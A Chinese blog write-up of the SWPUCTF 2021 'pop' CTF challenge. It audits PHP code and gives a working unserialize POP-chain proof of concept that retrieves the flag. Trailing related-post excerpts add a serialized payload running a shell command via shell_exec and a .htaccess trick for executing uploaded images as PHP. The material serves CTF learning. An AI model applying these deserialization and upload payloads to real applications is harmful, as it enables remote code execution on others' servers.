[SWPUCTF 2021 新生赛]pop

于 2024-10-12 20:17:07 发布
阅读量397 收藏 5
点赞数 5
文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80871705/article/details/142885317
版权

先进行代码审计:

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';    //!!!有private时,一定要进行url编码,否则有可能会出错

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){   
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}


//这段代码的意思就是,当admin的值w44m和passwd的值为08067时,输出flag
class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

//w22m类中,定义了一个变量w00m,和__destruct魔术方法,这个魔术方法在w22m销毁时调用,输出w00m的值

class w33m{
    public $w00m;
    public $w22m;         //这里定义了两个变量w00m和w22m
    public function __toString(){    //__toString()是一个魔术方法,用于将对象转换成字符串形式。
        $this->w00m->{$this->w22m}();    //调用w33m中w00m属性的w22m方法
        return 0;
    }
}

$w00m = $_GET['w00m'];    //用get方式传入w00m
unserialize($w00m);       //将w00m反序列化

我们要构造pop链,也就是反着来。

poc:

<?php
class w44m{
	private $admin = 'w44m';
    protected $passwd = '08067';
}
class w22m{
    public $w00m;
}
class w33m{
    public $w00m;
    public $w22m;
}
$a=new w22m();
$a->w00m=new w33m();
$a->w00m->w00m=new w44m();
$a->w00m->w22m='Getflag';
echo urlencode(serialize($a));
?>

运行结果:

最后将得到的结果传入

得到flag:NSSCTF{4bf68f1d-d723-4b87-b276-c879abf826ef}

参考链接:[SWPUCTF 2021 新生赛]pop-优快云博客

CTF笔记 [SWPUCTF 2021 新生]pop
qq_51248658的博客
10-28 3292
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1710
。。
NSS [SWPUCTF 2021 新生]pop
Jay17的博客
07-27 466
NSS [SWPUCTF 2021 新生]pop
[SWPUCTF 2021 新生]pop(NSSCTF)
m0_70819573的博客
03-03 380
phppop链的原理是构造不同类相互调用的链条,调用php的魔术方法来实现flag的读取。1.打开环境,审计代码。
[SWPUCTF 2021 新生]pop-----WP
pythllc的博客
10-23 571
源码展示。
php反序列化——pop链构造[SWPUCTF 2021 新生]pop [NISACTF 2022]babyserialize
m0_73756016的博客
03-27 1013
class w44m中的Getflag() -> class w33m中的__toString() -> class w22m中的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性中名为 $this->w22m 的方法。所以反推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这题的链条是(反推)
SWPUCTF 2021 新生
weixin_44770698的博客
12-21 4090
SWPUCTF 2021 新生(日常练习)
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1623
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
[SWPUCTF 2021 新生] 第三波放题
weixin_63231007的博客
04-12 7152
[SWPUCTF 2021 新生]easyupload3.0 首先弄个报错出来,随便弄一下,比如弄出一个not found页面,发现是Apache/2.4.7 (Ubuntu) ,既然是 Apache,于是就利用.htaccess来getshell。 建一个.htaccess 文件,里面的内容如下: <FilesMatch "123.jpg"> SetHandler application/x-httpd-php </FilesMatch> 这样的话对文件名包含“123.jp
[SWPUCTF 2021 新生]WEB刷题记录
m0_73239569的博客
11-16 221
往下看,w33m类的__toString()方法可以做到这一点,所以需要让$this->w00m为w44m类,而$this->w22m为“Getflag”。因此我们构造的东西($jay17),他是序列化后的w22m类,w22m类里面的变量w00m=w33m类,w33m类里面的变量w00m为w44m类,w33m类里面的变量w22m为w44m类里面的Getflag函数,并且w44m类的admin和password变量为w44m和08067。如果存在,它将获取该参数的值,并使用正则表达式检查是否包含空格。
NSSCTF题库[SWPUCTF 2021 新生]+部分新生签到题
热门推荐
J1ng_Hong的博客
10-27 2万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
ctf反序列化POP链介绍
最新发布
03-18
### CTF 中反序列化 POP 链的概念及应用 #### 什么是反序列化? 反序列化是指将存储的字节流转换回对象的过程。如果这个过程被恶意操控,则可能导致安全漏洞的发生。 #### 反序列化的常见起点、跳板和终点 在 CTF 的场景下,反序列化通常涉及以下几个关键部分: - **起点**:通常是可控输入进入程序的地方,例如 `unserialize()` 函数[^1]。 - **跳板**:中间可能经过多个类的方法调用,这些方法可以作为攻击路径的一部分。 - **终点**:最终目标是触发某个敏感操作,如执行命令或读取文件。 #### PHP 反序列化漏洞的核心机制 PHP 提供了一些特殊的魔术方法,在特定情况下会被自动调用。常见的魔术方法包括但不限于: - `__wakeup`:当对象被解序列化时调用。 - `__toString`:当尝试将对象转化为字符串时调用。 - `__destruct`:当销毁对象实例时调用。 这些魔术方法的存在使得攻击者可以通过精心构造的数据包来触发预期之外的行为[^2]。 #### 构造 POP 链的基础原理 POP (Property Oriented Programming) 链是一种技术手段,用于连接不同类之间的属性与方法调用来实现复杂的功能组合。具体来说: - 分析每一个可用类及其内部定义的所有函数是否有潜在利用价值; - 寻找能够相互配合形成链条关系的部分——即前一步的结果恰好满足下一步所需参数形式的情况; - 倒推出完整的执行流程直至达到控制危险行为的目的(如 eval 或 system 调用)[^3]。 以下是构建简单 POP Chain 的伪代码示例: ```php class VulnerableClass { public $cmd; function __construct($command){ $this->cmd=$command; } function executeCommand(){ shell_exec($this->cmd); } } // 利用了另一个类中的某些特性完成整个链路闭合 class HelperClass{ private $obj; function setObj(VulnerableClass $vuln_obj){ $this->obj = $vuln_obj; } function triggerExploit(){ $this->obj->executeCommand(); } } ``` 上述例子展示了如何通过设置合适的 `$cmd` 属性并触发相应事件从而达成远程代码执行的效果。 #### 实际案例分析 假设有一个 Web 应用接受用户上传数据并通过 `unserialize($_GET['data'])` 处理请求体内的信息。此时如果我们能提供如下结构的内容给服务器端解析: ```php O:9:"HelperClass":1:{s:3:"obj";O:14:"VulnerableClass":1:{s:3:"cmd";s:7:"id > /tmp/output";}} ``` 那么将会依次经历以下步骤: 1. 创建了一个名为 `HelperClass` 类型的对象实例,其成员变量 obj 初始化为指向另一实例. 2. 这个子对象属于类型 `VulnerableClass`,它携带了一条 Linux Shell Command 字符串"id". 3. 当后续逻辑触碰到 helper 对象上的任何动作都会间接导致 command execution 发生. 因此成功实现了从外部注入到本地任意指令运行的能力转化! --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值